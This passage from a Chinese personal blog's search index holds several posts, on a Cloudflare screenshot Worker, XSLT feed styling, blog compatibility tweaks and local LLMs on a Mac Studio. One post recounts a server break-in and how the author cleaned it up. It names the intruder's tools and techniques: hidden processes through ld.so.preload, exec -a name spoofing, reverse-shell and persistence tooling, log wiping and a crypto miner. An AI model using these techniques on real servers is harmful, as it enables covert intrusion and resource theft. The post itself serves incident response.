cache.put(datedKey, res.clone()),      ]));      return res;    } catch (err) {      console.error(\"Screenshot generation failed:\", err);      // 3. 回退到通用旧缓存      res = await tryGetCachedResponse(cacheKey);      if (res) return res;      return new Response(\"Screenshot generation failed\", { status: 502 });    }  },};使用方法很简单，创建一个Worker，把以上代码粘进去，然后把从“账户API令牌”中生成的令牌填到Worker的密钥中，名称为CF_API_TOKEN，另外再加一个名称为CF_ACCOUNT_ID的密钥，内容是账户ID，就是打开仪表板时URL中的那串16进制数字，除此之外还需要创建一个KV数据库，绑定到这个Worker上，绑定的名称是SCREENSHOT。如果想给自己的网站生成，可以Fork我的仓库，然后把里面首页文件中的网址替换成你的网站，然后再把Worker中的url替换成Fork后仓库的GitHub Pages地址就可以了。   最终的效果如下：   感想Cloudflare实在是太强了，虽然这个浏览器呈现免费用量并不多，但是有这么一个功能已经吊打很多Serverless服务了，毕竟浏览器对服务器资源的占用也不小，小内存的服务器甚至都不能运行，如果要自己搭的话成本可能也不小，而现在Cloudflare能免费提供，应该说不愧是赛博活佛吗🤣。" },{ "title": "一次服务器被入侵的经历", "category": "", "tags": "Linux, 安全, 服务器, 入侵", "url": "/2025/07/13/hacked.html", "date": "2025/07/13", "content": "即使是被入侵了也可以学到一些知识！起因前几天，我闲来无事登录了一下一台之前一直闲置的服务器，登录上去后，乍一看似乎没有任何问题，然后习惯性的执行了一下top命令看了一眼。从进程列表来看，似乎没有什么明显异常的地方，但是服务器的load值很高，cpu的us值也很高。   以前我倒也遇到过几次load值很高的情况，一般是硬盘或NFS等网络存储挂了但是依然有程序在读写挂载的目录会有这种问题，但那种情况一般高的是cpu的wa值，而不是us值，us值是软件正常用掉的……但是进程列表里根本没有占CPU的程序啊……看来服务器是被入侵了😰。检查服务器虽然说是要查，但其实我根本不知道进程隐藏的原理😂，虽然听说过有恶意软件会这样做，现在遇到了一时半会又想不出来怎么找。还好这是台闲置的服务器，上面什么东西都没有跑，所以正常来说除了ssh连接之外，这个服务器不该有任何其他的连接，于是我执行了一下netstat -tanp看了一眼，发现有个奇怪的进程使用一个境外的IP和我的服务器建立了连接，用ps -ef查了一下这个 PID，结果进程名显示为[kcached]……这下给我整不会了。   后来查了些资料知道了可以用lsof -p查看进程读取的文件，才看到木马的本体：/usr/bin/gs-dbus。不过如果我只是杀掉这个进程然后删除文件，那攻击者肯定会重新回来，所以我得排除一下是不是还有别的木马文件。   一般来说攻击者权限维持的方式大多是crontab，不过我看了一下配置文件里似乎没有，root下的authorized_keys倒是有个陌生的公钥于是顺手删掉了……也没有其他文件夹下有gs-dbus文件……难道没有别的木马文件了吗？后来我仔细找了一下，发现有个很可疑的文件/usr/local/lib/libprocesshider.so，一看就不是什么好东西🤣，后来在GitHub上搜了一下，是libprocesshider这个项目，就是它让我在top中什么也没找到的，看文档中应用是添加一个/etc/ld.so.preload文件，所以解除隐藏效果我也只需要删掉这个文件就好啦。   不过感觉还是不够……所以我全盘搜索了一下libprocesshider.so文件，果不其然还有，通过那个文件在/usr/games里找到了木马的大本营，里面有一堆这个入侵者的工具，于是就顺手保存了一份然后从服务器上删掉了。   另外还有自启动到底是怎么实现的？既然不是crontab……应该是systemd。看了一下果不其然有个服务在保持gs-dbus的运行，不过程序我已经删了，所以它现在只会不停尝试重启，接下来只需要停止并禁用这个服务就行了。   至于为什么会被入侵……我也很清楚，其实并没有什么漏洞，单纯是设置的密码太简单了，被嘿客扫到啦！所以解决起来也很简单，把这些垃圾清除掉之后设置个稍微复杂一点的密码就行了。入侵分析既然这个嘿客都不删他的工具，留下来就是给我分析的吧？那么我就像上次一样分析一下他使用的工具吧～首先里面有个deploy-all.sh文件，看起来应该是登录服务器之后最先执行的程序，在这里面有个压缩包，解压出来之后搜了一下里面的文件，发现是Global Socket项目，看起来应该是包含反弹Shell、伪装以及权限维持之类功能的一个小工具。看了下源代码才知道原来用exec -a就可以伪装进程的名称，而且那个gs-dbus就是这个项目里的程序……这么看来挖矿的操作应该是入侵者远程执行的代码，所以在查找进程的时候发现了它吧。   除此之外里面还有个logclean项目，看了一眼是mig-logcleaner-resurrected项目，看起来应该是清除日志用的，不过我根本没从日志找它🤣，即使入侵者用了对我来说也没起到什么作用。不过倒也是个挺有用的项目，也许在某些扫尾工作很有用。   最后就是libprocesshider这个项目，也许还有其他隐藏进程的方式，不过知道这个项目之后最起码以后再遇到类似的情况我就会优先去看/etc/ld.so.preload文件了。   至于其他的就是一些爆破SSH的工具，估计是用来横向渗透的，看起来有点原始……也没啥用处，另外还有连接XMR矿池的一些配置文件，以及我也看不出来的玩意，应该就这么多有用的东西了。感想虽然被入侵是没有预料的事情，但还好这个服务器是闲置的，装完系统之后上面什么有用的东西都没有，所以除了入侵者让它不太闲置赚了点小钱之外对我倒是没什么损失，另外还了解到了一些不错的小工具，这么看来入侵者赚的这点小钱就当是给他的学费吧🤣。" },{ "title": "使用XSLT为博客XML文件编写主题一致的样式", "category": "", "tags": "XSLT, 博客优化, XML, Feed", "url": "/2025/07/01/xslt.html", "date": "2025/07/01", "content": "虽然XML是机器读的内容……不过加上和主题一致的XSLT样式也算是一种细节吧～起因在上一篇文章中，我提到在提高订阅源兼容性的时候给博客的订阅文件增加了一个XSLT样式。当时使用的样式是从About Feeds下的一个Issue中找的，里面有个基于Pretty Feed修改成能同时支持RSS和Atom格式的样式。虽然那个样式倒也说不上难看，但总觉得与我的博客整体风格有些割裂，所以这次打算制作一个和我博客主题完全一致的XSLT样式。制作订阅文件的XSLT样式虽然想搞这么一个样式，但是我用的Jekyll引擎不能在引用的布局外添加额外内容……如果我要自己写，要么把我的默认布局拆成头和尾两部分然后用include引用，要么把默认布局的代码直接复制一份到XSLT样式中。这两个方案我都不太满意，第一种我以后在修改默认布局时需要同时从两个文件检查上下文，很不方便；而第二种方案违反了DRY原则，也会增加以后修改的难度。所以要怎么办呢？   后来我想了想，如果不能通过直接引用默认布局在外面增加XSLT的代码，那干脆让默认布局引用一个XSLT布局吧！这样我就能在不复制默认布局也不进行过多修改的情况下在外面套XSLT的代码了。于是我就在最外面写了个符合XSLT格式的XML布局，让默认布局引用它。然后再写一个布局引用默认布局，让最外面的布局根据这个布局的名字来判断是否需要使用XSLT的布局，具体的实现可以看我的layout目录。另外有一些地方需要注意一下，作为XML，内容中不能包含未闭合的标签，所有自闭合标签结尾必须添加斜杠，属性必须有值，以及所有标签和属性大小写要一致……还好我平时修改布局文件以及编写内容的时候基本上都遵循了这些规则，所以没什么太多需要改动的地方。   当时修改时，是模仿之前的那个样式进行的，原来那个样式在html元素上加了XML命名空间，但是xsl:output配置的输出却是按照HTML的方式输出，结果导致内容中用于换行的br标签在实际转换中全部变成了两个标签……我猜应该是转换器看到XML命名空间后，先按照XHTML的规则把br解析成了一开一闭的一对标签，然后又根据HTML的转换规则把这对标签当作两个单独的标签输出了吧……但奇怪的是，只有br标签出现了这个问题，像hr等其他自闭合标签则没有……既然如此，只要把XML命名空间删掉就OK了。   在改完之后虽然整体看上去和其他页面似乎已经很相似了，但总感觉还有些样式不太对劲……我猜应该是和文档类型声明有关系，我平时写的是HTML5，而XSLT默认转出来是HTML4.0……但是我不太清楚怎么解决这个问题，于是问了问AI，AI说在xsl:output中加上doctype-system=\"about:legacy-compat\"就行。最终改完试了下确实有效😂，样式上也没有出现奇怪的偏移了。   最后把写好的布局应用到/feed.xslt.xml中就可以了，之所以是这个路径是因为我用的jekyll-feed只支持这个位置，至于我自己搞的RSS格式的订阅只需要在开头用xml-stylesheet指令声明一下就行了。给XSLT样式自己的样式在写好给订阅文件用的XSLT样式之后，我发现XSLT样式本身也是个XML文件……既然我给订阅文件做了样式，那么也得给XSLT样式文件本身做个样式才对，但如果我单独写一个给它的样式，那岂不是要给样式的样式再写一个样式😂，所以肯定不能这样做。不过仔细想一下，还有个办法，可以让XSLT样式文件自引用自身的样式，这样就能避免之前担心的套娃问题了。所以接下来我应该在XSLT中写一个检测应用样式的XML文件是不是XSLT样式文件的代码，方法很简单，既然XSLT样式中肯定包含xsl:stylesheet这个元素，那么我可以判断如果存在这个元素，就可以确定这就是XSLT样式了，如果有人点开看了我就可以展示一个提示信息告诉访客这是一个样式文件，这样访客就不会看到那句“This XML file does not appear to have any style information associated with it. The document tree is shown below.”了😝。制作Sitemap的XSLT样式既然给XSLT样式也加了样式……那我博客还有其他XML文件需要处理吗？似乎还有个Sitemap，我的Sitemap是jekyll-sitemap插件生成的……那它支持加样式吗？虽然文档上没有写，不过看了眼源代码发现可以通过创建/sitemap.xsl文件添加，所以就顺手套用之前的样式搞了一个（虽然应该没有访客去看Sitemap😂，毕竟这是给搜索引擎用的）。可惜这些地址都是插件硬编码的，如果可以自己修改位置我就只写一个XSLT样式文件就可以了……感想折腾了这么多整体展示效果还不错，虽然这些文件也许根本没人看😂（本来就不是给人读的），但也算展现了一下博客的细节之处吧，而且在折腾的时候至少还了解了不少关于XML和XSLT的知识（尽管在现代这些好像没啥用了）。当然重要的也许不是了解这些知识，而是这个过程吧……总的来说还是挺有意思的。" },{ "title": "近期对博客的修改与优化记录", "category": "", "tags": "博客, 优化, IndieWeb", "url": "/2025/06/02/optimize.html", "date": "2025/06/02", "content": "在修改博客的时候也能学到不少新知识啊～起因在两个月前，我写了一篇针对博客搜索功能优化的记录。在写完之后没几天，有位名叫@xymoryn的大佬看到了我的博客并且进行了吐槽，内容很值得参考。不过我自从用minimal主题以来从来没有改过样式的原因主要还是写不来CSS😂，并不是真的不想改，但其中提到可以让AI优化，我觉得也很有道理，现在AI这么发达实在不会用AI改就好啦～对博客样式的优化虽然大佬给出了参考的CSS，但我不太喜欢那种风格，尤其还把之前的左右布局改成了上下布局。我当年之所以选择minimal主题就是因为它是左右布局的，如果选择上下布局的话我还不如用hacker这个主题，另外那个参考的CSS可能是因为AI写的，有很多没有考虑到的地方，比如主题自带的CSS鼠标放到链接上字体会变粗，然后可能会变宽，导致影响整体的布局，而参考的CSS选择直接让所有的链接放到上面都变细，即使原来是粗字体也变细，比如标题之类的，这就更难受了。像这种情况要怎么改呢？我还是希望能用minimal主题的CSS，但让链接变粗的体验确实不太好，所以我选择问问AI。   最后AI给出的答复是使用font-weight: inherit;，看起来确实解决了问题，不过如果鼠标移到链接上没有任何反应也不太好，所以就学GitHub在鼠标移到链接时加上了下划线。   除此之外就是字号、行高和布局，字号和行高我也不希望改的太激进，所以就稍微加了一点点，看起来没那么密就好。至于布局，之前minimal主题的宽度是写死的，左边是270px，右边是500px，对于我的MacBook看起来也还好，因为MacBook的屏幕比较小，屏幕的利用率还是比较高的。不过对于更大的屏幕总共860px大小的区域确实不太够，尤其是4K屏幕可能只有中间一点点的区域有内容，会看着很难受，所以我想了一下还是改成百分比布局比较好，这样无论屏幕有多宽也能利用得到。   还有一点就是分段，虽然我也知道在Markdown中两个换行是分段，但是感觉在文本中两个换行隔得太远了，所以一开始写文章的时候就选择只换行。不过在中文里确实不分段也不太好看，但是又不想去动之前写的文章，那该怎么办呢？思来想去干脆把换行全部替换成分段好啦，在Jekyll中可以用replace过滤器把所有的“<br>”替换成“</p><p>”，因为Markdown解析本来就会有一个段落，所以直接闭合加开始就能分割成多个段落了。那么加了分段是为了什么？其实主要是为了首行缩进，有首行缩进对阅读还是有挺大帮助的，至于怎么做也非常简单，直接给p标签设置text-indent: 2em;就可以了。   最后就是评论授权的问题，我用的Gitalk也有人问了这个问题，我仔细看了一下GitHub官方文档中OAuth可以授权的作用域发现确实是没办法限制只写Issues😥，至于其他的评论系统对后端的依赖又太多了，尤其是Giscus，居然是直接用iframe引用Giscus网站中的页面😅，如果Giscus哪天挂了，那评论系统不也挂了（虽然GitHub也不可靠……），至于自托管就更不可能了，我能让服务器持续运营可比不上大厂😆。所以最后我选择给Gitalk加个提示，不想登录也可以跳转到GitHub上进行评论，至于怎么加？还是让AI来吧，最后AI给我写了这么一串CSS：.gt-btn-login::after {  content: \"如果不想登录，请点击上方评论数跳转至对应ISSUE进行评论\";  position: absolute;  top: 100%;  left: 50%;  transform: translateX(-50%);  background: #333;  color: #fff;  padding: 8px 12px;  border-radius: 4px;  font-size: 12px;  white-space: nowrap;  opacity: 0;  visibility: hidden;  transition: opacity 0.2s, visibility 0.2s;  z-index: 10;}.gt-btn-login:hover::after {  opacity: 1;  visibility: visible;}.gt-btn-login::after {  margin-top: 8px;}.gt-btn-login::after {  box-shadow: 0 2px 8px rgba(0,0,0,0.15);}至此，关于博客样式的部分我觉得已经提高不少读者的用户体验了，也感谢大佬提出的建议。对博客兼容性的优化最近由于某些原因我又用起Windows 7了。其实我觉得Windows 7是一个很不错的操作系统，有很多人性化的东西，比如桌面小工具，自带Feed订阅，还有Windows Live Essentials等等，可惜后来全部被微软砍掉了🤣。考虑到Windows 7如此优秀，那要不然兼容一下它旗下的Internet Explorer 8浏览器吧？   其实GitHub给的那些Jekyll主题本身都是兼容IE8的，包括我在用的minimal主题也一样。但随着我这么多年加了许许多多的功能，绝大多数功能都没有考虑兼容性，只想着能用就行。不过我写的功能基本上都非常简单，如果想改得让它兼容IE8也并非难事，只要理论上可行就可以。当然也有些理论上不可能的东西，比如WebGL。因此，我的Live2D看板娘就没有任何可能性被支持了，至于其他的……也许有一些理论上可以支持，但是改起来比较麻烦的就也算了吧（比如Gitalk之类的）。对文章点击计数器的兼容性优化其实我的文章点击计数器从之前改成用jQuery调用自己的接口以后就没有什么兼容性的问题了，因为jQuery本来就是处理浏览器之间差异的库，而且也是兼容IE8的。只不过有个问题是IE8不支持用XHR跨域请求，只能用“XDR（XDomainRequest）”进行跨域请求……还好有个现成的库能让jQuery在遇到这种情况时使用XDR请求，于是我就用条件注释让IE9以下的浏览器引入这个库，这样在IE下也能正常显示文章点击数了😆。关于响应式布局的兼容性优化在IE8中的CSS是不支持媒体查询的，所以在修改窗口大小时也不能根据情况使用合适的样式。本来我没打算解决这个问题，结果恰好看到了一个库：Respond.js，所以就直接拿来用了😝。关于全文搜索的兼容性优化其实从功能的角度来说这种东西肯定是在IE8下可以实现的，但是我用的那个库有点迷，到处都用的是const关键字结果还莫名其妙判断XHR搞的好像是在兼容旧浏览器？改起来有点麻烦懒得搞了……不过除此之外还有个取巧的方式，既然我搜不了，干脆让谷歌来搜吧，至于谷歌支不支持IE8就不是我的事了🤣，所以直接给搜索框外面套了一个form表单，这样甚至可以在不启用JS的情况下搜索（假设谷歌支持没有JS的情况）。对于订阅软件的兼容性支持之前我的博客对订阅的支持是使用的官方的jekyll-feed插件，它只支持Atom格式的订阅，一般的阅读器也是支持这种格式的（即使是IE8也是完美支持）。但是我发现有非常少数的某些网站没办法解析Atom，只支持RSS……所以我只好特地加了对RSS格式的支持，还顺带搞了支持Atom和RSS格式的XSLT模板来预览。既然RSS也支持了，那干脆连JSONFeed也一起做了吧😆，虽然意义不是很大……给博客添加网页快讯既然要兼容IE8，那当然是能用的都用啦，在IE8订阅网站源的地方，有一个‘添加网页快讯’的功能。因为没有可以参考的网站，我甚至都没理解这个功能展现的效果是什么样的。我看这个网页快讯好像是抄了一部分hAtom Microformat的规范，我还以为是每个条目都单独需要一个entry-title和entry-content，结果发现并不是😅，一个hslice只能有一个entry-title……   这个功能其实非常简单，主要作用就是把网页的一部分切出来单独展示，当这一部分发生更新的时候IE浏览器就会提示用户。然后在这之中hslice要包裹所有需要处理的元素，写到最外面元素的class中就可以，entry-title是希望用户订阅时展示的名字，而entry-content是被切下来展示的网页。具体的内容可以在微软官方文档中看到。让网站增加对IndieWeb的支持既然说到Microformat，那就要提到IndieWeb了。虽然这个东西网络上也没几个人搞，但看起来有点意思就整下玩玩呗。第零级：域名根据他们的入门教程来看，成为IndieWeb最重要的一点就是有自己的域名。看到这一点我都怀疑这是不是卖域名的用来忽悠人的玩意？我一分钱也不想给域名注册商，虽然DNS这套系统确实维护需要成本，但是能有多大成本呢？绝大多数不都让ISP摊了？另外他们所说的大公司的服务可能会消失，那么域名就不会吗？注册商和注册局完全有能力让你的域名用不了，这也是我们不可控的东西，因此尽管这对于IndieWeb很重要，但是我不打算搞，于是我的博客就不是IndieWeb了🤣。第一级：识别身份没有域名也不影响接下来的步骤，大公司的域名也是域名（虽然不属于我）。根据教程来看，支持IndieAuth非常简单，只需要在head中加一个rel=me的link标签，指向IndieAuth支持的个人主页，并且那个个人主页有一个反链指向自己的网站就可以，比如指向自己的GitHub主页，那么就可以使用GitHub登录来验证这个网站属于我。这一步可以使用IndieWebify.Me来验证。第二级：发布内容在发布前，为了更好的让其他软件读取网站内容，需要用microformats2来标注网站内容，这个倒也不复杂，可以根据这个教程按照上面所说的东西用class名去标注对应的元素，标注完之后就可以用IndieWebify.Me验证了。   除此之外还需要用h-card标注网站的身份，解析完之后可以当网站名片用，具体可以看这里。   另外还有一点就是Webmentions，在网站上声明Webmentions可以让别人引用你的文章时通知一下你。不过对于静态博客不是很友好。一是要收，收完还要展示，二是要发，引用了别人的文章如果对面支持Webmentions要把自己引用的文章链接发给对方。虽然Jekyll有插件可以支持，但是我用GitHub额外装插件还得自己写Actions，而且我发布一次要在一堆Pages上更新，也不太适合，所以我打算光收不发（只需要在link标签中添加Webmentions的端点就可以），也不展示了，而且国内根本没几个人用Webmention🤣。如果有人对谁给我发了Webmention感兴趣，可以在这里查看（不过绝大多数都是我自己手动发的🤣）   如果谁有兴趣给自己的网站添加完整的Webmention，可以用Webmention Rocks!进行测试（如果使用了WordPress是自带的，只需要打开相关的功能就可以）。第三级：进行交流在IndieWeb中有一个很重要的事情就是相互交流，搞这个比较重要的目的是为了避免大公司的服务炸了，所以要替代比如推特，Facebook之类的服务，但是在这些服务还没炸的时候仍然可以在上面发自己的网站，也算是引流吧。他们把这个行为叫做POSSE。对我来说，我在微信、QQ之类的上面发自己新写的文章就算是POSSE了，毕竟我又不玩国外的社交平台😆。   除此之外似乎还要把别人的评论同步到自己网站？我能做到的顶多就是Gitalk了，更多的就算了吧～额外的内容既然已经支持了IndieWeb，那么不妨加入IndieWeb Webring吧。在IndieWeb Webring 🕸💍中的大多数网站都是适配了IndieWeb的，加入他们也算是证明自己适配IndieWeb的努力了吧😊。对博客可靠性的优化以前为了应对GitHub的不可靠，我仅仅是在各个Pages上部署了我的网站，但是后来我想了想Git本身就是分布式的，分发是一件很简单的事情啊，我要是想提高博客的可靠性，不如直接用Git分发到各个Git托管商就好了啊～因此我就利用GitLab镜像仓库的功能，一键把我的网站同步到数十个知名的Git托管商，提高了网站的可靠性，具体的列表可以在这里查看。感想在这次的博客优化中，了解了不少新的东西啊，不仅学习了CSS，还有了解如何提高网站兼容性，以及提高了博客的可靠性和曝光度。果然折腾博客本身也能提高自己啊，还能写文章分享一下折腾的经验😆。虽然折腾的内容不一定能在未来的生活中用得上，但是有意思就足够了😁。" },{ "title": "Mac Studio M3 Ultra使用体验", "category": "", "tags": "Apple, Mac, AI, LLM", "url": "/2025/05/07/mac-studio.html", "date": "2025/05/07", "content": "使用最强的Macintosh是一种什么样的感受？起因在两个月前苹果公司出了一款可以选配超大统一内存（512GiB）的Mac Studio，那时候我还想着如果市场反应好就整台玩玩，现在从网上的各种反应来看这确实是一个很不错的产品，所以这次我就整来啦！所以这次就来谈谈初上手的体验吧～远程体验虽然Mac Studio理论上拿来剪电影之类的应该是更好的选择，但是显然我不会剪电影🤣，而且也没有合适的屏幕给它用，所以拿到手之后我需要让它可以远程使用。   macOS配置远程还是挺简单的，只需要在设置 -> 通用 -> 共享中打开远程管理就可以了（似乎现在Ubuntu也可以像这样轻松地配置远程桌面），配置好之后需要启用“任何人都可以请求取得控制屏幕的权限”选项，不然可能会连不上……   另外如果需要配置SSH也只需要打开远程登录即可，最好把“允许远程用户对磁盘进行完全访问”也打开，免得使用时还需要额外的操作。   其实开启远程没什么特别的，不过我发现在远程Mac Studio时和我远程Intel芯片的Mac mini 2018以及黑苹果有一个不一样的地方，那就是屏幕共享类型可以选择“高性能”，在这个模式下远程的屏幕就可以变成一块虚拟屏幕，不受Mac连接的屏幕分辨率所影响，可以配置动态分辨率。即使连接的屏幕不支持HiDPI，只要远程的客户端支持那就可以支持，这一点和Windows的远程桌面有点像，但是体验好太多了，使用起来和本地几乎没有差别，当然代价就是对网络要求特别高，基本上如果不是局域网内远程，就不能使用这个模式。   在我配置好远程后我就可以拔掉屏幕，然后把Mac Studio放在阴暗的角落里为我服务了😆。关于LLM的体验配置环境买这个设备的当然也不为别的，主要就是为了能在本地跑完整参数的DeepSeek-R1，或者类似的MoE模型。至于KTransformers方案考虑到按照正价买要更贵（当然有便宜的购买方案，但是太不可靠了），而且这个框架也不够成熟，所以就算了。   在Mac上运行LLM有很多框架，最开始我选择的是Xinference，因为看它的文档中特地提到了苹果的MLX框架，而且可以使用命令启动，方便维护，另外看它支持的模型种类也比较多，所以就先考虑了它。   按照官方文档安装后就可以配置模型了，虽然它可以直接一键下载并运行模型，但是我已经提前下好了模型，另外……如果光运行DeepSeek-R1感觉也没啥意思，不如试试Perplexity AI的某个Finetune模型😆？所以我需要手动注册模型。配置好之后在MaxKB中配置好地址就可以使用了。   刚开始测试的时候倒是没啥问题，吐字的速度确实是挺快，但是用了几下就发现有不少问题，比如每次调用LLM的时候会发现内存压力会上升，APP内存会变成联动内存，在这个期间GPU并不会工作，需要等几秒钟，在生成结束的时候内存压力又会下降，联动内存会变回APP内存，每次生成都是这样。另外如果上文很长就要等几分钟，而且如果上文特别长的情况爆内存程序会直接卡死，还有并发也会导致程序卡死……总的来说这个框架根本不适合生产环境使用，而且文档也写的极其糟糕，看来是我看走眼了，不应该选择Xinference。   在抛弃Xinference之后我想了想还是随大流吧，选择了LM Studio，虽然它需要远程桌面操作，但是配置好之后应该也没有什么太多需要修改的地方，主要是社区相对要活跃得多，出了问题也好解决。   在我安装好LM Studio后发现这个支持的功能要多不少啊，还支持KV Cache量化，有了这个就可以支持更长的上下文了，另外它还支持超出上下文之后选择截断还是滚动，看起来使用非常的友好。   当我对LM Studio充满期待的时候问题就来了，我随便问了些问题，然后它回答的时候不知道什么情况会随机莫名其妙的冒出“<｜begin▁of▁sentence｜>”，出现这个之后后面的内容就会胡乱生成内容，怎么调都没法解决……后来看了一下DeepSeek的Issue里提到了似乎需要在模板中添加“<think>”标签才可以……但是这样的结果就是输出开头没有“<think>”了，MaxKB解析会出问题……这个问题的话回头看怎么解决吧，至少在模板中加上这个能正常使用了。LM Studio不会每次请求都重新加载一遍模型，输出第一个字的速度比Xinference快了很多，后面生成的速度也很快，输出的速度能接近20T/s，相比来说还是更有用一些。模型对比在我测试完DeepSeek-R1的某个微调模型后，最近阿里又出了一系列新模型：Qwen3，支持根据问题进行推理，据说它的235B参数的MoE模型比DeepSeek-R1还厉害，如果是真的，那就不需要用DeepSeek-R1了，虽然Mac Studio可以运行DeepSeek，但是512GiB内存也只能运行4位量化的DeepSeek-R1，而235B的Qwen3则可以用8位量化，还能空出不少内存用于上下文，想来应该效果会比DeepSeek好很多吧？于是我就下载试了试，然而刚下载好之后居然不能运行😅，首先是这个模型太新了，运行前需要把运行库的版本更新到最新，另外默认的模板有问题，解析会报错，需要根据这个Issue修改一下才能正常运行😅。在一切准备好之后，就可以进行测试了。   首先我试了试一些比较简单的问题，Qwen3回答的都还不错，例如24点、内容填空之类的，效果比QwQ-32B好了不少。测试的时候输出的速度和671B 4位量化的DeepSeek-R1基本一致。随后我让它用Mermaid绘制我以前写的AI摘要脚本的流程图，Qwen3绘制的结果是：graph TD    A[开始] --> B{解析URL路径}        B -->|/summary| C1[查询内容]    C1 --> D1{是否存在内容?}    D1 -- 是 --> E1[构建AI摘要提示词]    E1 --> F1[调用Qwen模型生成流式响应]    F1 --> G1[返回SSE流]    D1 -- 否 --> H1[返回'No Record']        B -->|/get_summary| C2[查询内容]    C2 --> D2{是否存在内容?}    D2 -- 否 --> H2[返回'no']    D2 -- 是 --> I2[计算内容SHA-256]    I2 --> J2{哈希匹配?}    J2 -- 否 --> H3[返回'no']    J2 -- 是 --> K2[查询摘要]    K2 --> L2{是否有摘要?}    L2 -- 是 --> M2[返回现有摘要]    L2 -- 否 --> N2[调用Qwen生成新摘要]    N2 --> O2[存储摘要到数据库]    O2 --> M2        B -->|/is_uploaded| C3[查询内容]    C3 --> D3{是否存在内容?}    D3 -- 否 --> H4[返回'no']    D3 -- 是 --> I3[计算内容SHA-256]    I3 --> J3{哈希匹配?}    J3 -- 否 --> H5[返回'no']    J3 -- 是 --> K3[返回'yes']    B -->|/upload_blog| C4{POST方法?}    C4 -- 否 --> H6[返回'need post']    C4 -- 是 --> I4[获取请求文本]    I4 --> J4[查询现有内容]    J4 --> K4{是否存在?}    K4 -- 否 --> L4[插入新内容]    K4 -- 是 --> M4{内容是否改变?}    L4 --> N4[返回'OK']    M4 -- 是 --> O4[更新内容并清空摘要]    O4 --> N4    B -->|/count_click*| C5[计算ID的MD5]    C5 --> D5[查询计数器]    D5 --> E5{是否含路径_add?}    E5 -- 是 --> F5[更新计数器+1]    E5 -- 否 --> G5[保持原值]    F5 --> H5[返回最新计数]    B -->|其他路径| I6[重定向到GitHub]DeepSeek-R1的某个微调模型的结果是：graph TD    A[接收请求] --> B{解析URL路径}    B --> |路径为/summary| C[获取查询参数id]    C --> D{id是否为null?}    D -->|是| E[返回错误响应]    D -->|否| F[查询数据库内容]    F --> G{内容存在?}    G -->|否| H[返回'No Record']    G -->|是| I[构建消息,调用AI生成摘要流]    I --> J[返回流式响应]    B --> |路径为/get_summary| K[获取id和签名参数]    K --> L[查询数据库内容]    L --> M{内容存在?}    M -->|否| N[返回'no']    M -->|是| O[计算SHA-256签名]    O --> P{签名匹配?}    P -->|否| Q[返回'no']    P -->|是| R[检查是否已有摘要]    R -->|有摘要| S[返回摘要内容]    R -->|无摘要| T[调用AI生成摘要]    T --> U[更新数据库]    U --> S    B --> |路径为/is_uploaded| V[获取id和签名]    V --> W[查询数据库内容]    W --> X{内容存在?}    X -->|否| Y[返回'no']    X -->|是| Z[计算SHA-256签名]    Z --> AA{签名匹配?}    AA -->|否| AB[返回'no']    AA -->|是| AC[返回'yes']    B --> |路径为/upload_blog| AD{方法是否为POST?}    AD -->|否| AE[返回'need post']    AD -->|是| AF[读取请求体数据]    AF --> AG[查询现有内容]    AG --> AH{记录存在?}    AH -->|否| AI[插入新记录]    AH -->|是| AJ{内容是否相同?}    AJ -->|否| AK[更新内容并清空摘要]    AJ -->|是| AL[直接返回OK]    AK --> AL    AL --> AM[返回'OK']    B --> |路径为/count_click| AN[计算MD5哈希]    AN --> AO[查询当前计数]    AO --> AP{记录存在?}    AP -->|否| AQ[插入新计数]    AP -->|是| AR[增加计数]    AR --> AS[更新计数器]    AQ --> AS    AS --> AT[返回当前计数值]    B --> |其他路径| AU[重定向到GitHub页面]    style A fill:#f9f,stroke:#333,stroke-width:2px    style E fill:#f96,stroke:#333    style H fill:#f96,stroke:#333    style Q fill:#f96,stroke:#333    style N fill:#f96,stroke:#333    style S fill:#9f9,stroke:#333    style AC fill:#9f9,stroke:#333    style AM fill:#9f9,stroke:#333    style AT fill:#9f9,stroke:#333    style AU fill:#99f,stroke:#333    subgraph 函数调用        O -.->|调用sha函数| SHA[计算SHA-256]        AN -.->|调用md5函数| MD5[计算MD5]    end    subgraph 数据库操作        F --> DB1[SELECT content]        L --> DB2[SELECT content]        R --> DB3[SELECT summary]        T --> DB4[UPDATE summary]        AG --> DB5[SELECT content]        AI --> DB6[INSERT新记录]        AK --> DB7[UPDATE content]        AO --> DB8[SELECT counter]        AQ --> DB9[INSERT计数器]        AR --> DB10[UPDATE counter]    end    subgraph AI处理        I --> AI1[构建系统提示]        AI1 --> AI2[调用Qwen模型]        T --> AI3[调用Qwen模型]    end这下就高下立判了🤣，同样的问题Qwen3只绘制了基础流程图，而DeepSeek-R1不仅包含子流程图，还通过颜色区分了响应类型，这么看来Qwen3还是不太行啊～当然我的测试非常的片面，仅仅根据这几次测试分析的结果。至于Qwen3到底有没有使用价值，回头再让其他人测测看效果如何吧。UTM虚拟机的测试在上次在UTM上用苹果虚拟化框架安装Windows的测试中我用的是Intel芯片的Mac，那时候已经说了打算等Mac Studio到了之后尝试一下用VZ框架安装Windows。那么经过我的测试结果如何呢？想不到居然失败了😭，相同的操作流程在重装脚本执行完后，再重启就没有任何反应了。在活动监视器中虽然可以看到虚拟机的CPU占用是100%，但是内存只占用了100多MiB，而且CPU占用没有任何跳变，显然系统没有正常启动。随后我又尝试在QEMU中安装好Windows然后把VZ虚拟机的硬盘替换掉，结果依旧一样，内存还是只占了100多MiB……看来ARM处理器和x86处理器还是有很大区别啊……   不过这个虚拟机到底有什么区别？为什么会无法启动呢？想到我在Intel芯片的Mac中测试用VZ框架是可以看到CPU型号的，再看看Mac Studio中的Linux虚拟机……似乎没有任何与CPU型号有关的信息，用QEMU至少也能看到类似“virt”之类的CPU型号，用VZ框架就什么信息都没有了……看来Apple芯片和正常的ARM处理器还是有不少区别啊……   不过除了这个以外还有什么有意思的东西可以测试吗？这时候我就想到了Asahi Linux，Apple芯片下的UTM有一个多出来的选项就是可以安装macOS虚拟机，那我能不能在macOS虚拟机中安装Asahi Linux呢？根据我的实际测试，结果也是不行的……因为Asahi Linux不支持M3 Ultra芯片😞，至于M2芯片能不能在虚拟机中运行Asahi Linux……虽然我的MacBook是M2芯片，但是不太想在我常用的机器上搞测试，所以也不知道实际上可不可以。另外Asahi Linux这个项目也基本上停了，估计以后新出的芯片也不会有机会安装Linux了，就像在macOS上运行Windows程序的Whisky项目也停了……真是太遗憾了😢。感想从这次体验来看，512GiB内存的Mac Studio M3 Ultra确实很厉害，本地跑LLM速度非常快，20T/s的速度已经很厉害了，而且风扇声音很小，在GPU满载的时候也完全听不到风扇的声音。当然这个前提是跑MoE模型，虽然我没测Dense模型，但想来根据M3 